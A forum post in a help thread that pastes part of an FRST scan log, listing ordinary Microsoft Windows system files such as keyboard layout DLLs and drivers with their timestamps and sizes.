2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mshidkmdf.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00008598 _____ C:\WINDOWS\system32\ResPriImageList
2016-12-03 08:34 - 2016-12-03 08:34 - 00008484 _____ C:\WINDOWS\system32\kanji_2.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ C:\WINDOWS\system32\settings.dat
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccessRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\simpdata.tlb
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUSX.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTZM.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTUQ.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSW09.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSORS1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSF.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDPO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDPL1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDPL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNEPR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLV1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIULAT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINTAM.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINORI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINMAL.DLL

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #32 on: January 25, 2017, 08:58:10 PM »
18th continuation of FRST

2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINDEV.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINBEN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIBO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHU.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHELA3.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHELA2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHE319.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHE220.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGTHC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGR1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGKL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDES.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBENE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdax2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd106n.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd106.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd101.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\gpuenergydrv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmdrmsdk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\shimeng.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDYCC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDYBA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDYAK.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDWOL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDVNTC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUZB.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUSR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUSL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUSA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUR1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUGHR1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUGHR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTURME.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTT102.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTIFI2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTIFI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTH3.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTH2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTH1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTH0.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTAT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTAJIK.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDTAILE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSYR2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSYR1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSW.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSP.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSORA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDRU1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdphags.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDPASH.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDOSM.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDOLDIT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDOLCH.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDOGHAM.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNTL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDNE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMYAN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMONST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMONMO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMON.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMLT48.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMLT47.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMAORI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMACST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDMAC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLV.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLT2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLT1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdlisus.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdlisub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLAO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKURD.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKNI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKHMR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKAZ.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDJAV.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIT142.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINTEL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINPUN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINMAR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINKAN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINHIN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINGUJ.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINBE2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINBE1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDINASA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHU1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdhebl3.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHAW.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeoqw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeooa.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeome.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeoer.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGAE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFTHRK.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFI.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdfar.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDEST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDDZO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDDIV2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDDIV1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDDA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCHER.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBULG.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBUG.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBU.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBLR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBHC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBGPH1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBGPH.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDBASH.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZST.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZEL.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZE.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdarmty.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdarmph.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDA3.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDA1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd103.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd101c.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd101b.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbd101a.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007440 _____ (Microsoft Corporation) C:\WINDOWS\system32\uxlibres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\stdole32.tlb
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDURDU.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDUK.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDSN1.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDRU.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdnko.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDLT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKYR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIT.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDIC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHEB.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDHAU.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDGEO.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDFA.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDDV.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDARMW.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDARME.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDA2.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Firewall.cpl
2016-12-03 08:34 - 2016-12-03 08:34 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\null.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00006948 _____ C:\WINDOWS\system32\kanji_1.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00006886 _____ C:\WINDOWS\system32\SecurityAndMaintenance_Error.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-hal-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-storage-tiering-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-sleepstudy-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005796 _____ C:\WINDOWS\system32\SecurityAndMaintenance.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\system32\normaliz.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\security.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msidntld.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdatsrc.tlb
2016-12-03 08:34 - 2016-12-03 08:34 - 00004687 _____ C:\WINDOWS\system32\wpcmon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00004675 _____ C:\WINDOWS\system32\wsmanconfig_schema.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00004608 _____ (Microsoft) C:\WINDOWS\system32\WEB.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00004608 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2help.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00004148 _____ C:\WINDOWS\system32\psmodulediscoveryprovider.mof
2016-12-03 08:34 - 2016-12-03 08:34 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzsyncres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-processor-aggregator-events.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00004014 _____ C:\WINDOWS\system32\xwizard.dtd
2016-12-03 08:34 - 2016-12-03 08:34 - 00003666 _____ C:\WINDOWS\system32\sysprtj.sep
2016-12-03 08:34 - 2016-12-03 08:34 - 00003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_8.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanutil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003584 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCertResources.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003458 _____ C:\WINDOWS\system32\ieuinit.inf
2016-12-03 08:34 - 2016-12-03 08:34 - 00003317 _____ C:\WINDOWS\system32\sysprint.sep
2016-12-03 08:34 - 2016-12-03 08:34 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\sfc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msafd.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lz32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\icmp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootstr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002778 _____ C:\WINDOWS\system32\AppxProvisioning.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00002626 _____ C:\WINDOWS\system32\SecurityAndMaintenance_Alert.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tier2punctuations.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\TelephonyInteractiveUserRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\rnr20.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneutilRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneServiceRes.dll
